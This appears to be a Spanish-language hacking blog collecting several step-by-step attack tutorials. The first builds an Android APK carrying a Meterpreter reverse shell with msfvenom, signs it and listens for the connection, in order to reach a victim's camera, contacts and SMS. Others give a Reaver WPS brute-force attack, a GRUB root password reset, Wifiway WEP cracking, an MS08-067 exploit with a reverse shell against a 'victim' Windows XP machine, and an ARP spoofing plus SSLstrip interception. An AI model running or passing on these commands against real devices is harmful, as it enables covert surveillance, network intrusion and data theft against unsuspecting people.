Infectando a Android

Estándar

El sistema operativo Android es uno de los más usados  en la actualidad, por su facilidad de manejo y personalización del celular, además lo podemos encontrar de manera masificada en los teléfonos y tablets,   además de estos dispositivos se puede encontrar en relojes inteligente, autos, etc.

Con el correr de los tiempos se han encontrado diversas fallas en su mecanismo de seguridad, asimismo se  debe sumar  falta de conocimiento de los usuarios finales, los cuales no se informan  de los permisos  que están  dando a la aplicación que van a instalar, de este manera se ha podido infectar aplicaciones para tener acceso  al teléfono sí que el usuario tenga conocimiento.  También  se ha visto que se puede tener acceso a través de un mms, spam, anuncios, etc.

En el siguiente tutorial  se verá la forma de tener acceso a un móvil  con una aplicación infectada en una red local , la cual nos dará  acceso a las carpeta, cámara, grabar voz , ver los contactos del dispositivos y los sms entre otras cosas.

Herramientas a usar

  • Kali Linux 2.0
  • El paquete SignApk –> Descargar
  • Celular o Tablet para probar la aplicación

Procedimiento:

Paso 1.

Vamos a crear la aplicación para esto abrimos una terminal  y colocamos el siguiente comando.

#msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.47 LPORT=1524 R > Nombre.apk

paso1

Paso 2.

Ahora a la aplicación se debe colocar  el certificado y  la clave privada, para esto descargamos el paquete de SignApk, lo extraemos lo cual nos va  aparecer una carpeta llamada SignApk.

paso2

Paso 3.

Debe mover la aplicación creada en el paso 1 a la carpeta  SignApk, una realizado debe ingresar el siguiente comando.

#java –jar signapk.jar certificate.pem key.pk8 nombre.apk nvo-nombre.apk

paso3paso3.1

Paso 4

Se debe abrir la consola de Metasploit para esto ingresamos el comando
#msfconsole

paso4paso4.2

paso 5

Ingrese el siguiente comando  en la consola de Metasploit
use multi/handler

paso5
Handler es lo que utilizamos para conectar con un. Dependiendo del payload, el handler quedará a la escucha esperando una conexión por parte del payload (reverse payload) o iniciará una conexión contra un host en un puerto especificado.

Paso 6

Ahora se debe indicar que PAYLOAD  se va a utilizar, configuraciones de PAYLOAD (LPORT, LHOST).  Ejecutar el exploit

paso6paso7paso8

Paso 7

Después de ejecutar el exploit, se debe infectar el dispositivo  android, lo cual pueden usar varias tecnicas, por lo cual se deja a elección de cada uno.

Una vez instalada la aplicacion en el dispositvos ya tendremos acceso a el, para ver que comandos podemos usar en la consola solo ingresamos help.

paso10

Video:

Anuncios

Ataque con Reaver (WPS WPA2)

Minientrada

Hoy en día una gran mayoría de los routers que traen  conexión wireless vienen  con el mecanismo de seguridad WPS, la cual consiste en la autenticación de  8 números, pero con avanzar del tiempo se fue  viendo que este sistema traía un problema debido a que  con solo saber los cuatros primeros números el dicho router te daba acceso a la red.

Para poder acceder a la red sin necesidad de saber ocho pines debemos realizar un ataque de fuerza bruta la cual consiste en enviar diferentes pines  hasta encontrar el correcto, para esto usaremos la herramienta reaver la cual nos permite realizar el ataque  contra los AP.

Para poder auditar la red de wifi con el método reaver necesitamos lo siguiente:

  • Reaver ( Viene incluido en kali Linux )
  • Aircrack-ng
  • Una tarjeta de red inalámbrica o un adaptador inalámbrico usb ( o Notebook)

Este post se realizo con Kali Linux 1.0

Procedimiento:

Paso 1: Lo primero que se debe  realizar es colocar la tarjeta inalámbrica en modo monitor, para eso se debe colocar el siguiente  comando:

# airmon-ng start wlan0

Captura

Paso 2: Se debe buscar la red de wifi a auditar, ingrese el siguiente comando

#airodump-ng mon0

Captura3

Captura4

Paso 3: El siguiente comando es para chequear si el router tiene disponible el mecanismo de seguridad wps

#wash –i mon0

Captura2

Paso 4:  Finalmente en este paso vamos  a realizar el ataque de fuerza bruta con reaver de la siguiente manera

#reaver –i mon0 –b AA:BB:CC:DD:EE:FF –e Condell –C 11

Captura5Captura6Captura7

 

Video:

 

Recuperación de contraseña Root

Estándar

Para recuperar la contraseña del Root lo podemos realizar  a través de nuestro Grub, para esto debemos editar la línea de boot y agregar single al final  además de otros pasos que lo explicaremos en este tutorial.

Pasos

1- Reiniciamos nuestro computador

2- Al reiniciarse nuestro computador nos mostrara la ventana donde debemos seleccionar el sistema operativo, nos colocamos en la que corresponde a nuestra distribución pulsamos  la tecla ‘e’ para entrar al modo de edición.Paso 1

en la siguiente ventana veremos varias líneas, que son los argumentos con los que inicia nuestro sistema, buscamos  en la que inicia con ‘kernel’ y pulsamos ‘e’ para editarla.

Paso 2

3- Al final se debe escribir single para luego proceder pulsar la tecla enter.
Paso 3

4- Luego apretamos b, en el cual nuestro equipo se reiniciara tal como se muestra en la imagen

Paso 4

Paso 5

5- Por ultimo escribimos passwd root y nos pedirá ingresar la nueva contraseña para nuestro root

Paso 66- Reboot

Wifiway 3.4 contraseñas WEP con feeding bottle

Estándar

Bueno lo primero que tenemos que sabe que es wifiway?

Wifiway es una distribución de GNU\LINUX diseñada para  auditoría de seguridad de las redes WiFi, Bluetooth y RFID

Lo que tenemos que tener es el ISO de wifiway el cual lo podemos descargar en el siguiente  link

Descargar

Bueno antes de empezar debemos hacer que wifiway botee desde un USB para eso bajamos LinuxLive USB Creator

Descargar

Un consejo debemos tener formateado el USB con FAT32 antes de crear el booteable

Bueno en el paso 1 elegimos nuestro USB  que utilizaremos

En el paso 2 hacemos clic en la imagen  donde dice ISO/IMG/

el paso 3 y 4 lo dejamos así tal como esta

y par a finalizar en el paso 5 le hacemos clic al rayo

bueno  al terminar de crear el USB Booteable tienen que reiniciar su maquina

Aquí le dejo el video como se utiliza el wifiway para descifrar  las claves wep  el video es  de la web  wifiway.org

Ingresar a Través del Puerto 445

Imagen

Un puerto TCP/IP abierto por defecto en el sistema operativo puede permitir a un usuario ingresar facilmente  a su sistema si autorizacion nos puede llegar a consumir 100% de los recurso del equipo y dejar destrozos o hasta dejar fuera de funcionamiento

antes de empezar necesitamos un pc con backtrack y una victima que este usando Windows xp

lo primero que debemos hacer es saber nuestra ip para no confundirse

Ahora escaneamos nuestra red en búsqueda de alguna victima
#nmap -sP 192.168.1.1-255

lo siguiente tenemos que ver  si nuestra victima tiene habilitado el puerto 445
#nmap -sS -sP 192.168.1.26

como lo tiene abilitado empezaremos hacer el trabajo de conexión con metasploit
#msfconsole

buscamos el exploit que usaremos

#search /windows/smb/ms
#use exploit/windows/smb/ms08_067_netapi

ahora hay que asignar la direccion de la victima y la nuestra

> set payload  windows/meterpreter/reverse_tcp
> set rhost 192.168.1.26 (ip de victima)
> set lhost 192.168.1.28  (nuestra ip)
> exploit       ——>ejecutamos el exploit

ahora escribimos shell para ingresar al cmd de nuestra victima

>shell

cd  ..
cd ..

hicimos dos cd .. para quedar ubicados en el disco duro C:
hacemos un dir para saber que tiene en el disco duro

y hacemos lo que queramos ahora crear carpetas, apagar el equipo,etc

eso es todo

Vídeo de desmostracion 

ARPSPOOF + SSLSTRIP

Estándar

Introducción:

En principio envanamiento ARP es enviar mensajes ARP falsos (spoofed)

la finalidad de esto es para que nuestra dirección mac con la dirección ip de nuestra victima se asocien

para que el trafico que va de la pc de nuestra victima hacia la puerta de enlace, sera erróneamente envida a nuestra pc haci podamos hacer algun ataque  como por ejemplos:

Ataque pasivo o escucha: los datos se reenvian hacia la puerta de enlace sin modificaiones

Ataque activo: antes de reenviar los datos  se modifican

Ataque tip Dos: Denegacion de servicios

en el siguiente video nos mostrala como hacer para eso necesitamos Backtrack y una victima

y tendran que bajar el sslstrip